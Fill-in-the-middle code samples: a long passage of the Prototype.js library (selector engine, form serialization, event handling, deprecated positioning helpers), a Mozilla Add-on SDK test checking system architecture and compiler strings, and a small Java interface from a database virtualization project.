if (mm = formula.match(/^(\d+)$/)) // digit only
return '[' + fragment + "= " + mm[1] + ']';
if (mm = formula.match(/^(-?\d*)?n(([+-])(\d+))?/)) { // an+b
if (mm[1] == "-") mm[1] = -1;
var a = mm[1] ? Number(mm[1]) : 1;
var b = mm[2] ? Number(mm[2]) : 0;
predicate = "[((#{fragment} - #{b}) mod #{a} = 0) and " +
"((#{fragment} - #{b}) div #{a} >= 0)]";
return new Template(predicate).evaluate({
fragment: fragment, a: a, b: b });
}
}
}
},
criteria: {
tagName: 'n = h.tagName(n, r, "#{1}", c); c = false;',
className: 'n = h.className(n, r, "#{1}", c); c = false;',
id: 'n = h.id(n, r, "#{1}", c); c = false;',
attrPresence: 'n = h.attrPresence(n, r, "#{1}"); c = false;',
attr: function(m) {
m[3] = (m[5] || m[6]);
return new Template('n = h.attr(n, r, "#{1}", "#{3}", "#{2}"); c = false;').evaluate(m);
},
pseudo: function(m) {
if (m[6]) m[6] = m[6].replace(/"/g, '\\"');
return new Template('n = h.pseudo(n, "#{1}", "#{6}", r, c); c = false;').evaluate(m);
},
descendant: 'c = "descendant";',
child: 'c = "child";',
adjacent: 'c = "adjacent";',
laterSibling: 'c = "laterSibling";'
},
patterns: {
// combinators must be listed first
// (and descendant needs to be last combinator)
laterSibling: /^\s*~\s*/,
child: /^\s*>\s*/,
adjacent: /^\s*\+\s*/,
descendant: /^\s/,
// selectors follow
tagName: /^\s*(\*|[\w\-]+)(\b|$)?/,
id: /^#([\w\-\*]+)(\b|$)/,
className: /^\.([\w\-\*]+)(\b|$)/,
pseudo: /^:((first|last|nth|nth-last|only)(-child|-of-type)|empty|checked|(en|dis)abled|not)(\((.*?)\))?(\b|$|(?=\s)|(?=:))/,
attrPresence: /^\[([\w]+)\]/,
attr: /\[((?:[\w-]*:)?[\w-]+)\s*(?:([!^$*~|]?=)\s*((['"])([^\4]*?)\4|([^'"][^\]]*?)))?\]/
},
// for Selector.match and Element#match
assertions: {
tagName: function(element, matches) {
return matches[1].toUpperCase() == element.tagName.toUpperCase();
},
className: function(element, matches) {
return Element.hasClassName(element, matches[1]);
},
id: function(element, matches) {
return element.id === matches[1];
},
attrPresence: function(element, matches) {
return Element.hasAttribute(element, matches[1]);
},
attr: function(element, matches) {
var nodeValue = Element.readAttribute(element, matches[1]);
return Selector.operators[matches[2]](nodeValue, matches[3]);
}
},
handlers: {
// UTILITY FUNCTIONS
// joins two collections
concat: function(a, b) {
for (var i = 0, node; node = b[i]; i++)
a.push(node);
return a;
},
// marks an array of nodes for counting
mark: function(nodes) {
for (var i = 0, node; node = nodes[i]; i++)
node._counted = true;
return nodes;
},
unmark: function(nodes) {
for (var i = 0, node; node = nodes[i]; i++)
node._counted = undefined;
return nodes;
},
// mark each child node with its position (for nth calls)
// "ofType" flag indicates whether we're indexing for nth-of-type
// rather than nth-child
index: function(parentNode, reverse, ofType) {
parentNode._counted = true;
if (reverse) {
for (var nodes = parentNode.childNodes, i = nodes.length - 1, j = 1; i >= 0; i--) {
var node = nodes[i];
if (node.nodeType == 1 && (!ofType || node._counted)) node.nodeIndex = j++;
}
} else {
for (var i = 0, j = 1, nodes = parentNode.childNodes; node = nodes[i]; i++)
if (node.nodeType == 1 && (!ofType || node._counted)) node.nodeIndex = j++;
}
},
// filters out duplicates and extends all nodes
unique: function(nodes) {
if (nodes.length == 0) return nodes;
var results = [], n;
for (var i = 0, l = nodes.length; i < l; i++)
if (!(n = nodes[i])._counted) {
n._counted = true;
results.push(Element.extend(n));
}
return Selector.handlers.unmark(results);
},
// COMBINATOR FUNCTIONS
descendant: function(nodes) {
var h = Selector.handlers;
for (var i = 0, results = [], node; node = nodes[i]; i++)
h.concat(results, node.getElementsByTagName('*'));
return results;
},
child: function(nodes) {
var h = Selector.handlers;
for (var i = 0, results = [], node; node = nodes[i]; i++) {
for (var j = 0, children = [], child; child = node.childNodes[j]; j++)
if (child.nodeType == 1 && child.tagName != '!') results.push(child);
}
return results;
},
adjacent: function(nodes) {
for (var i = 0, results = [], node; node = nodes[i]; i++) {
var next = this.nextElementSibling(node);
if (next) results.push(next);
}
return results;
},
laterSibling: function(nodes) {
var h = Selector.handlers;
for (var i = 0, results = [], node; node = nodes[i]; i++)
h.concat(results, Element.nextSiblings(node));
return results;
},
nextElementSibling: function(node) {
while (node = node.nextSibling)
if (node.nodeType == 1) return node;
return null;
},
previousElementSibling: function(node) {
while (node = node.previousSibling)
if (node.nodeType == 1) return node;
return null;
},
// TOKEN FUNCTIONS
tagName: function(nodes, root, tagName, combinator) {
tagName = tagName.toUpperCase();
var results = [], h = Selector.handlers;
if (nodes) {
if (combinator) {
// fastlane for ordinary descendant combinators
if (combinator == "descendant") {
for (var i = 0, node; node = nodes[i]; i++)
h.concat(results, node.getElementsByTagName(tagName));
return results;
} else nodes = this[combinator](nodes);
if (tagName == "*") return nodes;
}
for (var i = 0, node; node = nodes[i]; i++)
if (node.tagName.toUpperCase() == tagName) results.push(node);
return results;
} else return root.getElementsByTagName(tagName);
},
id: function(nodes, root, id, combinator) {
var targetNode = $(id), h = Selector.handlers;
if (!targetNode) return [];
if (!nodes && root == document) return [targetNode];
if (nodes) {
if (combinator) {
if (combinator == 'child') {
for (var i = 0, node; node = nodes[i]; i++)
if (targetNode.parentNode == node) return [targetNode];
} else if (combinator == 'descendant') {
for (var i = 0, node; node = nodes[i]; i++)
if (Element.descendantOf(targetNode, node)) return [targetNode];
} else if (combinator == 'adjacent') {
for (var i = 0, node; node = nodes[i]; i++)
if (Selector.handlers.previousElementSibling(targetNode) == node)
return [targetNode];
} else nodes = h[combinator](nodes);
}
for (var i = 0, node; node = nodes[i]; i++)
if (node == targetNode) return [targetNode];
return [];
}
return (targetNode && Element.descendantOf(targetNode, root)) ? [targetNode] : [];
},
className: function(nodes, root, className, combinator) {
if (nodes && combinator) nodes = this[combinator](nodes);
return Selector.handlers.byClassName(nodes, root, className);
},
byClassName: function(nodes, root, className) {
if (!nodes) nodes = Selector.handlers.descendant([root]);
var needle = ' ' + className + ' ';
for (var i = 0, results = [], node, nodeClassName; node = nodes[i]; i++) {
nodeClassName = node.className;
if (nodeClassName.length == 0) continue;
if (nodeClassName == className || (' ' + nodeClassName + ' ').include(needle))
results.push(node);
}
return results;
},
attrPresence: function(nodes, root, attr) {
if (!nodes) nodes = root.getElementsByTagName("*");
var results = [];
for (var i = 0, node; node = nodes[i]; i++)
if (Element.hasAttribute(node, attr)) results.push(node);
return results;
},
attr: function(nodes, root, attr, value, operator) {
if (!nodes) nodes = root.getElementsByTagName("*");
var handler = Selector.operators[operator], results = [];
for (var i = 0, node; node = nodes[i]; i++) {
var nodeValue = Element.readAttribute(node, attr);
if (nodeValue === null) continue;
if (handler(nodeValue, value)) results.push(node);
}
return results;
},
pseudo: function(nodes, name, value, root, combinator) {
if (nodes && combinator) nodes = this[combinator](nodes);
if (!nodes) nodes = root.getElementsByTagName("*");
return Selector.pseudos[name](nodes, value, root);
}
},
pseudos: {
'first-child': function(nodes, value, root) {
for (var i = 0, results = [], node; node = nodes[i]; i++) {
if (Selector.handlers.previousElementSibling(node)) continue;
results.push(node);
}
return results;
},
'last-child': function(nodes, value, root) {
for (var i = 0, results = [], node; node = nodes[i]; i++) {
if (Selector.handlers.nextElementSibling(node)) continue;
results.push(node);
}
return results;
},
'only-child': function(nodes, value, root) {
var h = Selector.handlers;
for (var i = 0, results = [], node; node = nodes[i]; i++)
if (!h.previousElementSibling(node) && !h.nextElementSibling(node))
results.push(node);
return results;
},
'nth-child': function(nodes, formula, root) {
return Selector.pseudos.nth(nodes, formula, root);
},
'nth-last-child': function(nodes, formula, root) {
return Selector.pseudos.nth(nodes, formula, root, true);
},
'nth-of-type': function(nodes, formula, root) {
return Selector.pseudos.nth(nodes, formula, root, false, true);
},
'nth-last-of-type': function(nodes, formula, root) {
return Selector.pseudos.nth(nodes, formula, root, true, true);
},
'first-of-type': function(nodes, formula, root) {
return Selector.pseudos.nth(nodes, "1", root, false, true);
},
'last-of-type': function(nodes, formula, root) {
return Selector.pseudos.nth(nodes, "1", root, true, true);
},
'only-of-type': function(nodes, formula, root) {
var p = Selector.pseudos;
return p['last-of-type'](p['first-of-type'](nodes, formula, root), formula, root);
},
// handles the an+b logic
getIndices: function(a, b, total) {
if (a == 0) return b > 0 ? [b] : [];
return $R(1, total).inject([], function(memo, i) {
if (0 == (i - b) % a && (i - b) / a >= 0) memo.push(i);
return memo;
});
},
// handles nth(-last)-child, nth(-last)-of-type, and (first|last)-of-type
nth: function(nodes, formula, root, reverse, ofType) {
if (nodes.length == 0) return [];
if (formula == 'even') formula = '2n+0';
if (formula == 'odd') formula = '2n+1';
var h = Selector.handlers, results = [], indexed = [], m;
h.mark(nodes);
for (var i = 0, node; node = nodes[i]; i++) {
if (!node.parentNode._counted) {
h.index(node.parentNode, reverse, ofType);
indexed.push(node.parentNode);
}
}
if (formula.match(/^\d+$/)) { // just a number
formula = Number(formula);
for (var i = 0, node; node = nodes[i]; i++)
if (node.nodeIndex == formula) results.push(node);
} else if (m = formula.match(/^(-?\d*)?n(([+-])(\d+))?/)) { // an+b
if (m[1] == "-") m[1] = -1;
var a = m[1] ? Number(m[1]) : 1;
var b = m[2] ? Number(m[2]) : 0;
var indices = Selector.pseudos.getIndices(a, b, nodes.length);
for (var i = 0, node, l = indices.length; node = nodes[i]; i++) {
for (var j = 0; j < l; j++)
if (node.nodeIndex == indices[j]) results.push(node);
}
}
h.unmark(nodes);
h.unmark(indexed);
return results;
},
'empty': function(nodes, value, root) {
for (var i = 0, results = [], node; node = nodes[i]; i++) {
// IE treats comments as element nodes
if (node.tagName == '!' || (node.firstChild && !node.innerHTML.match(/^\s*$/))) continue;
results.push(node);
}
return results;
},
'not': function(nodes, selector, root) {
var h = Selector.handlers, selectorType, m;
var exclusions = new Selector(selector).findElements(root);
h.mark(exclusions);
for (var i = 0, results = [], node; node = nodes[i]; i++)
if (!node._counted) results.push(node);
h.unmark(exclusions);
return results;
},
'enabled': function(nodes, value, root) {
for (var i = 0, results = [], node; node = nodes[i]; i++)
if (!node.disabled) results.push(node);
return results;
},
'disabled': function(nodes, value, root) {
for (var i = 0, results = [], node; node = nodes[i]; i++)
if (node.disabled) results.push(node);
return results;
},
'checked': function(nodes, value, root) {
for (var i = 0, results = [], node; node = nodes[i]; i++)
if (node.checked) results.push(node);
return results;
}
},
operators: {
'=': function(nv, v) { return nv == v; },
'!=': function(nv, v) { return nv != v; },
'^=': function(nv, v) { return nv.startsWith(v); },
'$=': function(nv, v) { return nv.endsWith(v); },
'*=': function(nv, v) { return nv.include(v); },
'~=': function(nv, v) { return (' ' + nv + ' ').include(' ' + v + ' '); },
'|=': function(nv, v) { return ('-' + nv.toUpperCase() + '-').include('-' + v.toUpperCase() + '-'); }
},
matchElements: function(elements, expression) {
var matches = new Selector(expression).findElements(), h = Selector.handlers;
h.mark(matches);
for (var i = 0, results = [], element; element = elements[i]; i++)
if (element._counted) results.push(element);
h.unmark(matches);
return results;
},
findElement: function(elements, expression, index) {
if (Object.isNumber(expression)) {
index = expression; expression = false;
}
return Selector.matchElements(elements, expression || '*')[index || 0];
},
findChildElements: function(element, expressions) {
var exprs = expressions.join(','), expressions = [];
exprs.scan(/(([\w#:.~>+()\s-]+|\*|\[.*?\])+)\s*(,|$)/, function(m) {
expressions.push(m[1].strip());
});
var results = [], h = Selector.handlers;
for (var i = 0, l = expressions.length, selector; i < l; i++) {
selector = new Selector(expressions[i].strip());
h.concat(results, selector.findElements(element));
}
return (l > 1) ? h.unique(results) : results;
}
});
function $$() {
return Selector.findChildElements(document, $A(arguments));
}
var Form = {
reset: function(form) {
$(form).reset();
return form;
},
serializeElements: function(elements, options) {
if (typeof options != 'object') options = { hash: !!options };
else if (options.hash === undefined) options.hash = true;
var key, value, submitted = false, submit = options.submit;
var data = elements.inject({ }, function(result, element) {
if (!element.disabled && element.name) {
key = element.name; value = $(element).getValue();
if (value != null && (element.type != 'submit' || (!submitted &&
submit !== false && (!submit || key == submit) && (submitted = true)))) {
if (key in result) {
// a key is already present; construct an array of values
if (!Object.isArray(result[key])) result[key] = [result[key]];
result[key].push(value);
}
else result[key] = value;
}
}
return result;
});
return options.hash ? data : Object.toQueryString(data);
}
};
Form.Methods = {
serialize: function(form, options) {
return Form.serializeElements(Form.getElements(form), options);
},
getElements: function(form) {
return $A($(form).getElementsByTagName('*')).inject([],
function(elements, child) {
if (Form.Element.Serializers[child.tagName.toLowerCase()])
elements.push(Element.extend(child));
return elements;
}
);
},
getInputs: function(form, typeName, name) {
form = $(form);
var inputs = form.getElementsByTagName('input');
if (!typeName && !name) return $A(inputs).map(Element.extend);
for (var i = 0, matchingInputs = [], length = inputs.length; i < length; i++) {
var input = inputs[i];
if ((typeName && input.type != typeName) || (name && input.name != name))
continue;
matchingInputs.push(Element.extend(input));
}
return matchingInputs;
},
disable: function(form) {
form = $(form);
Form.getElements(form).invoke('disable');
return form;
},
enable: function(form) {
form = $(form);
Form.getElements(form).invoke('enable');
return form;
},
findFirstElement: function(form) {
var elements = $(form).getElements().findAll(function(element) {
return 'hidden' != element.type && !element.disabled;
});
var firstByIndex = elements.findAll(function(element) {
return element.hasAttribute('tabIndex') && element.tabIndex >= 0;
}).sortBy(function(element) { return element.tabIndex }).first();
return firstByIndex ? firstByIndex : elements.find(function(element) {
return ['input', 'select', 'textarea'].include(element.tagName.toLowerCase());
});
},
focusFirstElement: function(form) {
form = $(form);
form.findFirstElement().activate();
return form;
},
request: function(form, options) {
form = $(form), options = Object.clone(options || { });
var params = options.parameters, action = form.readAttribute('action') || '';
if (action.blank()) action = window.location.href;
options.parameters = form.serialize(true);
if (params) {
if (Object.isString(params)) params = params.toQueryParams();
Object.extend(options.parameters, params);
}
if (form.hasAttribute('method') && !options.method)
options.method = form.method;
return new Ajax.Request(action, options);
}
};
/*--------------------------------------------------------------------------*/
Form.Element = {
focus: function(element) {
$(element).focus();
return element;
},
select: function(element) {
$(element).select();
return element;
}
};
Form.Element.Methods = {
serialize: function(element) {
element = $(element);
if (!element.disabled && element.name) {
var value = element.getValue();
if (value != undefined) {
var pair = { };
pair[element.name] = value;
return Object.toQueryString(pair);
}
}
return '';
},
getValue: function(element) {
element = $(element);
var method = element.tagName.toLowerCase();
return Form.Element.Serializers[method](element);
},
setValue: function(element, value) {
element = $(element);
var method = element.tagName.toLowerCase();
Form.Element.Serializers[method](element, value);
return element;
},
clear: function(element) {
$(element).value = '';
return element;
},
present: function(element) {
return $(element).value != '';
},
activate: function(element) {
element = $(element);
try {
element.focus();
if (element.select && (element.tagName.toLowerCase() != 'input' ||
!['button', 'reset', 'submit'].include(element.type)))
element.select();
} catch (e) { }
return element;
},
disable: function(element) {
element = $(element);
element.blur();
element.disabled = true;
return element;
},
enable: function(element) {
element = $(element);
element.disabled = false;
return element;
}
};
/*--------------------------------------------------------------------------*/
var Field = Form.Element;
var $F = Form.Element.Methods.getValue;
/*--------------------------------------------------------------------------*/
Form.Element.Serializers = {
input: function(element, value) {
switch (element.type.toLowerCase()) {
case 'checkbox':
case 'radio':
return Form.Element.Serializers.inputSelector(element, value);
default:
return Form.Element.Serializers.textarea(element, value);
}
},
inputSelector: function(element, value) {
if (value === undefined) return element.checked ? element.value : null;
else element.checked = !!value;
},
textarea: function(element, value) {
if (value === undefined) return element.value;
else element.value = value;
},
select: function(element, index) {
if (index === undefined)
return this[element.type == 'select-one' ?
'selectOne' : 'selectMany'](element);
else {
var opt, value, single = !Object.isArray(index);
for (var i = 0, length = element.length; i < length; i++) {
opt = element.options[i];
value = this.optionValue(opt);
if (single) {
if (value == index) {
opt.selected = true;
return;
}
}
else opt.selected = index.include(value);
}
}
},
selectOne: function(element) {
var index = element.selectedIndex;
return index >= 0 ? this.optionValue(element.options[index]) : null;
},
selectMany: function(element) {
var values, length = element.length;
if (!length) return null;
for (var i = 0, values = []; i < length; i++) {
var opt = element.options[i];
if (opt.selected) values.push(this.optionValue(opt));
}
return values;
},
optionValue: function(opt) {
// extend element because hasAttribute may not be native
return Element.extend(opt).hasAttribute('value') ? opt.value : opt.text;
}
};
/*--------------------------------------------------------------------------*/
Abstract.TimedObserver = Class.create(PeriodicalExecuter, {
initialize: function($super, element, frequency, callback) {
$super(callback, frequency);
this.element = $(element);
this.lastValue = this.getValue();
},
execute: function() {
var value = this.getValue();
if (Object.isString(this.lastValue) && Object.isString(value) ?
this.lastValue != value : String(this.lastValue) != String(value)) {
this.callback(this.element, value);
this.lastValue = value;
}
}
});
Form.Element.Observer = Class.create(Abstract.TimedObserver, {
getValue: function() {
return Form.Element.getValue(this.element);
}
});
Form.Observer = Class.create(Abstract.TimedObserver, {
getValue: function() {
return Form.serialize(this.element);
}
});
/*--------------------------------------------------------------------------*/
Abstract.EventObserver = Class.create({
initialize: function(element, callback) {
this.element = $(element);
this.callback = callback;
this.lastValue = this.getValue();
if (this.element.tagName.toLowerCase() == 'form')
this.registerFormCallbacks();
else
this.registerCallback(this.element);
},
onElementEvent: function() {
var value = this.getValue();
if (this.lastValue != value) {
this.callback(this.element, value);
this.lastValue = value;
}
},
registerFormCallbacks: function() {
Form.getElements(this.element).each(this.registerCallback, this);
},
registerCallback: function(element) {
if (element.type) {
switch (element.type.toLowerCase()) {
case 'checkbox':
case 'radio':
Event.observe(element, 'click', this.onElementEvent.bind(this));
break;
default:
Event.observe(element, 'change', this.onElementEvent.bind(this));
break;
}
}
}
});
Form.Element.EventObserver = Class.create(Abstract.EventObserver, {
getValue: function() {
return Form.Element.getValue(this.element);
}
});
Form.EventObserver = Class.create(Abstract.EventObserver, {
getValue: function() {
return Form.serialize(this.element);
}
});
if (!window.Event) var Event = { };
Object.extend(Event, {
KEY_BACKSPACE: 8,
KEY_TAB: 9,
KEY_RETURN: 13,
KEY_ESC: 27,
KEY_LEFT: 37,
KEY_UP: 38,
KEY_RIGHT: 39,
KEY_DOWN: 40,
KEY_DELETE: 46,
KEY_HOME: 36,
KEY_END: 35,
KEY_PAGEUP: 33,
KEY_PAGEDOWN: 34,
KEY_INSERT: 45,
cache: { },
relatedTarget: function(event) {
var element;
switch(event.type) {
case 'mouseover': element = event.fromElement; break;
case 'mouseout': element = event.toElement; break;
default: return null;
}
return Element.extend(element);
}
});
Event.Methods = (function() {
var isButton;
if (Prototype.Browser.IE) {
var buttonMap = { 0: 1, 1: 4, 2: 2 };
isButton = function(event, code) {
return event.button == buttonMap[code];
};
} else if (Prototype.Browser.WebKit) {
isButton = function(event, code) {
switch (code) {
case 0: return event.which == 1 && !event.metaKey;
case 1: return event.which == 1 && event.metaKey;
default: return false;
}
};
} else {
isButton = function(event, code) {
return event.which ? (event.which === code + 1) : (event.button === code);
};
}
return {
isLeftClick: function(event) { return isButton(event, 0) },
isMiddleClick: function(event) { return isButton(event, 1) },
isRightClick: function(event) { return isButton(event, 2) },
element: function(event) {
var node = Event.extend(event).target;
return Element.extend(node.nodeType == Node.TEXT_NODE ? node.parentNode : node);
},
findElement: function(event, expression) {
var element = Event.element(event);
return element.match(expression) ? element : element.up(expression);
},
pointer: function(event) {
return {
x: event.pageX || (event.clientX +
(document.documentElement.scrollLeft || document.body.scrollLeft)),
y: event.pageY || (event.clientY +
(document.documentElement.scrollTop || document.body.scrollTop))
};
},
pointerX: function(event) { return Event.pointer(event).x },
pointerY: function(event) { return Event.pointer(event).y },
stop: function(event) {
Event.extend(event);
event.preventDefault();
event.stopPropagation();
event.stopped = true;
}
};
})();
Event.extend = (function() {
var methods = Object.keys(Event.Methods).inject({ }, function(m, name) {
m[name] = Event.Methods[name].methodize();
return m;
});
if (Prototype.Browser.IE) {
Object.extend(methods, {
stopPropagation: function() { this.cancelBubble = true },
preventDefault: function() { this.returnValue = false },
inspect: function() { return "[object Event]" }
});
return function(event) {
if (!event) return false;
if (event._extendedByPrototype) return event;
event._extendedByPrototype = Prototype.emptyFunction;
var pointer = Event.pointer(event);
Object.extend(event, {
target: event.srcElement,
relatedTarget: Event.relatedTarget(event),
pageX: pointer.x,
pageY: pointer.y
});
return Object.extend(event, methods);
};
} else {
Event.prototype = Event.prototype || document.createEvent("HTMLEvents").__proto__;
Object.extend(Event.prototype, methods);
return Prototype.K;
}
})();
Object.extend(Event, (function() {
var cache = Event.cache;
function getEventID(element) {
if (element._eventID) return element._eventID;
arguments.callee.id = arguments.callee.id || 1;
return element._eventID = ++arguments.callee.id;
}
function getDOMEventName(eventName) {
if (eventName && eventName.include(':')) return "dataavailable";
return eventName;
}
function getCacheForID(id) {
return cache[id] = cache[id] || { };
}
function getWrappersForEventName(id, eventName) {
var c = getCacheForID(id);
return c[eventName] = c[eventName] || [];
}
function createWrapper(element, eventName, handler) {
var id = getEventID(element);
var c = getWrappersForEventName(id, eventName);
if (c.pluck("handler").include(handler)) return false;
var wrapper = function(event) {
if (!Event || !Event.extend ||
(event.eventName && event.eventName != eventName))
return false;
Event.extend(event);
handler.call(element, event)
};
wrapper.handler = handler;
c.push(wrapper);
return wrapper;
}
function findWrapper(id, eventName, handler) {
var c = getWrappersForEventName(id, eventName);
return c.find(function(wrapper) { return wrapper.handler == handler });
}
function destroyWrapper(id, eventName, handler) {
var c = getCacheForID(id);
if (!c[eventName]) return false;
c[eventName] = c[eventName].without(findWrapper(id, eventName, handler));
}
function destroyCache() {
for (var id in cache)
for (var eventName in cache[id])
cache[id][eventName] = null;
}
if (window.attachEvent) {
window.attachEvent("onunload", destroyCache);
}
return {
observe: function(element, eventName, handler) {
element = $(element);
var name = getDOMEventName(eventName);
var wrapper = createWrapper(element, eventName, handler);
if (!wrapper) return element;
if (element.addEventListener) {
element.addEventListener(name, wrapper, false);
} else {
element.attachEvent("on" + name, wrapper);
}
return element;
},
stopObserving: function(element, eventName, handler) {
element = $(element);
var id = getEventID(element), name = getDOMEventName(eventName);
if (!handler && eventName) {
getWrappersForEventName(id, eventName).each(function(wrapper) {
element.stopObserving(eventName, wrapper.handler);
});
return element;
} else if (!eventName) {
Object.keys(getCacheForID(id)).each(function(eventName) {
element.stopObserving(eventName);
});
return element;
}
var wrapper = findWrapper(id, eventName, handler);
if (!wrapper) return element;
if (element.removeEventListener) {
element.removeEventListener(name, wrapper, false);
} else {
element.detachEvent("on" + name, wrapper);
}
destroyWrapper(id, eventName, handler);
return element;
},
fire: function(element, eventName, memo) {
element = $(element);
if (element == document && document.createEvent && !element.dispatchEvent)
element = document.documentElement;
if (document.createEvent) {
var event = document.createEvent("HTMLEvents");
event.initEvent("dataavailable", true, true);
} else {
var event = document.createEventObject();
event.eventType = "ondataavailable";
}
event.eventName = eventName;
event.memo = memo || { };
if (document.createEvent) {
element.dispatchEvent(event);
} else {
element.fireEvent(event.eventType, event);
}
return event;
}
};
})());
Object.extend(Event, Event.Methods);
Element.addMethods({
fire: Event.fire,
observe: Event.observe,
stopObserving: Event.stopObserving
});
Object.extend(document, {
fire: Element.Methods.fire.methodize(),
observe: Element.Methods.observe.methodize(),
stopObserving: Element.Methods.stopObserving.methodize()
});
(function() {
/* Support for the DOMContentLoaded event is based on work by Dan Webb,
Matthias Miller, Dean Edwards and John Resig. */
var timer, fired = false;
function fireContentLoadedEvent() {
if (fired) return;
if (timer) window.clearInterval(timer);
document.fire("dom:loaded");
fired = true;
}
if (document.addEventListener) {
if (Prototype.Browser.WebKit) {
timer = window.setInterval(function() {
if (/loaded|complete/.test(document.readyState))
fireContentLoadedEvent();
}, 0);
Event.observe(window, "load", fireContentLoadedEvent);
} else {
document.addEventListener("DOMContentLoaded",
fireContentLoadedEvent, false);
}
} else {
document.write("<script id=__onDOMContentLoaded defer src=//:><\/script>");
$("__onDOMContentLoaded").onreadystatechange = function() {
if (this.readyState == "complete") {
this.onreadystatechange = null;
fireContentLoadedEvent();
}
};
}
})();
/*------------------------------- DEPRECATED -------------------------------*/
Hash.toQueryString = Object.toQueryString;
var Toggle = { display: Element.toggle };
Element.Methods.childOf = Element.Methods.descendantOf;
var Insertion = {
Before: function(element, content) {
return Element.insert(element, {before:content});
},
Top: function(element, content) {
return Element.insert(element, {top:content});
},
Bottom: function(element, content) {
return Element.insert(element, {bottom:content});
},
After: function(element, content) {
return Element.insert(element, {after:content});
}
};
var $continue = new Error('"throw $continue" is deprecated, use "return" instead');
// This should be moved to script.aculo.us; notice the deprecated methods
// further below, that map to the newer Element methods.
var Position = {
// set to true if needed, warning: firefox performance problems
// NOT neeeded for page scrolling, only if draggable contained in
// scrollable elements
includeScrollOffsets: false,
// must be called before calling withinIncludingScrolloffset, every time the
// page is scrolled
prepare: function() {
this.deltaX = window.pageXOffset
|| document.documentElement.scrollLeft
|| document.body.scrollLeft
|| 0;
this.deltaY = window.pageYOffset
|| document.documentElement.scrollTop
|| document.body.scrollTop
|| 0;
},
// caches x/y coordinate pair to use with overlap
within: function(element, x, y) {
if (this.includeScrollOffsets)
return this.withinIncludingScrolloffsets(element, x, y);
this.xcomp = x;
this.ycomp = y;
this.offset = Element.cumulativeOffset(element);
return (y >= this.offset[1] &&
y < this.offset[1] + element.offsetHeight &&
x >= this.offset[0] &&
x < this.offset[0] + element.offsetWidth);
},
withinIncludingScrolloffsets: function(element, x, y) {
var offsetcache = Element.cumulativeScrollOffset(element);
this.xcomp = x + offsetcache[0] - this.deltaX;
this.ycomp = y + offsetcache[1] - this.deltaY;
this.offset = Element.cumulativeOffset(element);
return (this.ycomp >= this.offset[1] &&
this.ycomp < this.offset[1] + element.offsetHeight &&
this.xcomp >= this.offset[0] &&
this.xcomp < this.offset[0] + element.offsetWidth);
},
// within must be called directly before
overlap: function(mode, element) {
if (!mode) return 0;
if (mode == 'vertical')
return ((this.offset[1] + element.offsetHeight) - this.ycomp) /
element.offsetHeight;
if (mode == 'horizontal')
return ((this.offset[0] + element.offsetWidth) - this.xcomp) /
element.offsetWidth;
},
// Deprecation layer -- use newer Element methods now (1.5.2).
cumulativeOffset: Element.Methods.cumulativeOffset,
positionedOffset: Element.Methods.positionedOffset,
absolutize: function(element) {
Position.prepare();
return Element.absolutize(element);
},
relativize: function(element) {
Position.prepare();
return Element.relativize(element);
},
realOffset: Element.Methods.cumulativeScrollOffset,
offsetParent: Element.Methods.getOffsetParent,
page: Element.Methods.viewportOffset,
clone: function(source, target, options) {
options = options || { };
return Element.clonePosition(target, source, options);
}
};
/*--------------------------------------------------------------------------*/
if (!document.getElementsByClassName) document.getElementsByClassName = function(instanceMethods){
function iter(name) {
return name.blank() ? null : "[contains(concat(' ', @class, ' '), ' " + name + " ')]";
}
instanceMethods.getElementsByClassName = Prototype.BrowserFeatures.XPath ?
function(element, className) {
className = className.toString().strip();
var cond = /\s/.test(className) ? $w(className).map(iter).join('') : iter(className);
return cond ? document._getElementsByXPath('.//*' + cond, element) : [];
} : function(element, className) {
className = className.toString().strip();
var elements = [], classNames = (/\s/.test(className) ? $w(className) : null);
if (!classNames && !className) return elements;
var nodes = $(element).getElementsByTagName('*');
className = ' ' + className + ' ';
for (var i = 0, child, cn; child = nodes[i]; i++) {
if (child.className && (cn = ' ' + child.className + ' ') && (cn.include(className) ||
(classNames && classNames.all(function(name) {
return !name.toString().blank() && cn.include(' ' + name + ' ');
}))))
elements.push(Element.extend(child));
}
return elements;
};
return function(className, parentElement) {
return $(parentElement || document.body).getElementsByClassName(className);
};
}(Element.Methods);
/*--------------------------------------------------------------------------*/
Element.ClassNames = Class.create();
Element.ClassNames.prototype = {
initialize: function(element) {
this.element = $(element);
},
_each: function(iterator) {
this.element.className.split(/\s+/).select(function(name) {
return name.length > 0;
})._each(iterator);
},
set: function(className) {
this.element.className = className;
},
add: function(classNameToAdd) {
if (this.include(classNameToAdd)) return;
this.set($A(this).concat(classNameToAdd).join(' '));
},
remove: function(classNameToRemove) {
if (!this.include(classNameToRemove)) return;
this.set($A(this).without(classNameToRemove).join(' '));
},
toString: function() {
return $A(this).join(' ');
}
};
Object.extend(Element.ClassNames.prototype, Enumerable);
/*--------------------------------------------------------------------------*/
Element.addMethods();<|fim▁end|>
|
var Abstract = { };
|
<|file_name|>test-system.js<|end_file_name|><|fim▁begin|>/* This Source Code Form is subject to the terms of the Mozilla Public
* License, v. 2.0. If a copy of the MPL was not distributed with this
* file, You can obtain one at http://mozilla.org/MPL/2.0/. */
"use strict";
const runtime = require("sdk/system/runtime");
const system = require("sdk/system");
exports["test system architecture and compiler"] = function(assert) {
if (system.architecture !== null) {
assert.equal(
runtime.XPCOMABI.indexOf(system.architecture), 0,
"system.architecture is starting substring of runtime.XPCOMABI"
);
}
if (system.compiler !== null) {
assert.equal(
runtime.XPCOMABI.indexOf(system.compiler),
runtime.XPCOMABI.length - system.compiler.length,
"system.compiler is trailing substring of runtime.XPCOMABI"
);
}
assert.ok(<|fim▁hole|> system.architecture === null || typeof(system.architecture) === "string",
"system.architecture is string or null if not supported by platform"
);
assert.ok(
system.compiler === null || typeof(system.compiler) === "string",
"system.compiler is string or null if not supported by platform"
);
};
require("test").run(exports);<|fim▁end|>
| |
<|file_name|>CacheableStatement.java<|end_file_name|><|fim▁begin|>package com.tesora.dve.sql.statement;
/*
* #%L
* Tesora Inc.
* Database Virtualization Engine
* %%
* Copyright (C) 2011 - 2014 Tesora Inc.
* %%
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU Affero General Public License, version 3,<|fim▁hole|> * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU Affero General Public License for more details.
*
* You should have received a copy of the GNU Affero General Public License
* along with this program. If not, see <http://www.gnu.org/licenses/>.
* #L%
*/
import com.tesora.dve.lockmanager.LockType;
import com.tesora.dve.sql.expression.TableKey;
import com.tesora.dve.sql.util.ListSet;
public interface CacheableStatement {
public LockType getLockType();
public ListSet<TableKey> getAllTableKeys();
}<|fim▁end|>
